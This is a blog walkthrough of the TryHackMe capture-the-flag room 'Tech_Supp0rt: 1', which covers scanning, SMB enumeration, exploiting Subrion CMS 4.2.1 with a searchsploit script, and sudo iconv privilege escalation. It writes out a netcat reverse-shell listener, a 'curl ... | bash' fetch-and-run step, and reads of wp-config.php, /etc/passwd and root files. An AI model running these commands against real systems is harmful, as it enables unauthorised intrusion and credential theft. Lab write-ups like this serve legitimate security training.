Hello, Tech_Supp0rt: 1? I Think I Have a Problem with My CMS: TryHackMe Walkthrough

Hello, Tech_Supp0rt: 1? I Think I Have a Problem with My CMS: TryHackMe Walkthrough

In this walkthrough, we explore the Tech_Supp0rt: 1 CTF on TryHackMe, covering steps such as using Nmap for scanning, Gobuster for directory enumeration, enum4linux for SMB share discovery, exploiting a Subrion panel, and escalating privileges to root. The process involves identifying open ports, finding directories and shares, cracking credentials, exploiting a vulnerable CMS, and ultimately gaining root access to the system.

Step 1: Nmap

nmap -T4 -sV -sC -A -p- 10.10.185.192 --min-rate 1000
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=7/12%OT=22%CT=1%CU=36267%PV=Y%DS=4%DC=T%G=Y%TM=64AEDF5
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=109%GCD=2%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(O1=M509ST11NW7%O2=M509ST11
OS:NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=68D
OS:F%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M50
OS:9NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2023-07-12T22:43:56+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-07-12T17:13:54
|_  start_date: N/A
|_clock-skew: mean: -1h49m57s, deviation: 3h10m29s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Step 2: Gobuster

gobuster dir --url http://10.10.185.192/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -q

Step 3: enum4linux

Let's run a scan to see which shares are available.

enum4linux 10.10.185.192

Step 4: SMB Share

smbclient //10.10.185.192/websvr

Let's see what is in this text file.

Hmmm. Let's see if we can crack this with CyberChef.

Step 5: Subrion Panel

Let's enumerate for a Subrion panel using gobuster.

gobuster dir --url http://10.10.185.192/subrion/ -f -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o subrion.txt -b 301,302,304 -t 100 -q

We discovered an admin panel. Let's plugin the credentials we gathered from our earlier recon.

It looks like the CMS version is 4.2.1. Searchsploit has an exploit for this.

Download by typing:

searchsploit -m php/webapps/49876.py

Step 6: Exploit

Exploit:

python3 49876.py -u http://10.10.185.192/subrion/panel/ --user=admin --passw=********

Nice! Now, let's get a better stable shell on here. First, let's start a Python server where our reverse shell is located:

python3 -m http.server 8000

Then start a netcat listener to catch the shell:

rlwrap nc -lvnp 1337

Finally, pull the script onto the victim box:

curl http://10.10.185.192:8000/shell.sh | bash

Let's upgrade it:

python -c 'import;pty.spawn("/bin/sh")'
export TERM=xterm-256color

Step 7: Privesc and Root

First, let's check crontab:

cat /etc/crontab

No attack vector here, let's check the binaries:

find / -type f -perm -04000 -ls 2>/dev/null

Nothing here either, let's dig around the file system for something useful.

/var/www/html/wordpress/wp-config.php has a password that we can use to pivot.

Let's check /etc/passwd for usernames.

We can take the password we found from the wp-config.php and log in to scamsite.

And we're in. Let's see what we can run as sudo.

We can run /usr/bin/iconv as sudo. Let's check GTFObins for a privesc method.

LFILE=/root/root.txt
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"

From here we could use this binary to read the /etc/shadow file and elevate permissions or create ways to maintain persistence. Overall, this box was very enjoyable and I'm glad there was a unique vector in order to gain root-level privileges.

Did you find this article valuable?

Support J4KE - Cybersecurity Blog by becoming a sponsor. Any amount is appreciated!